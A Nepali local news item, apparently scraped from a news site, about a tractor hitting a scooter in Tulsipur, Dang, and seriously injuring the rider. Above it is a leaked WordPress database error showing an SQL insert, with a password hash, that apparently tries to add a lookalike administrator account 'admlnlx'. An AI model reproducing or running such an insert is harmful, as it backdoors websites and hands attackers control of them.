WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYZEPADYqoD6/PBMt1DMGzXKM.WX6M.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 14:47:19', '', 'admlnlx', 'admlnlx')
दाङ,फागुन ५ –
तुलसीपुरमा ट्याक्टरले ठक्कर दिँदा स्कुटर चालक गम्भीर घाइते भएका छन्। बिहीबार विहान साढे सात बजे रा ३ प ४३२० नम्बरको स्कुटरलाई लु ३ प ११५८ नम्बरको ट्याक्टरले तुलसीपुर बजारमै ठक्कर दिएको हो। तुलसीपुर ५ ‘ख’ लाइनमा पश्चिमतर्फ जाँदै गरेको स्कुटरलाई बाहिनी चोक तर्फ जाँदै गरेको ट्याक्टरले ठक्कर दिएको हो। दुर्घटनामा तुलसीपुर ५ का ४५ बर्षीय केशर वली गम्भीर घाइते भएका ट्राफिक प्रहरी कार्यालय तुलसीपुरले जानकारी दिएको छ। घाइते वलीको हाल राप्ती अञ्चल अस्पताल तुलसीपुरमा उपचार भइरहेको छ। उनको छातीमा भित्री चोट देखिएको अस्पतालले जनाएको छ।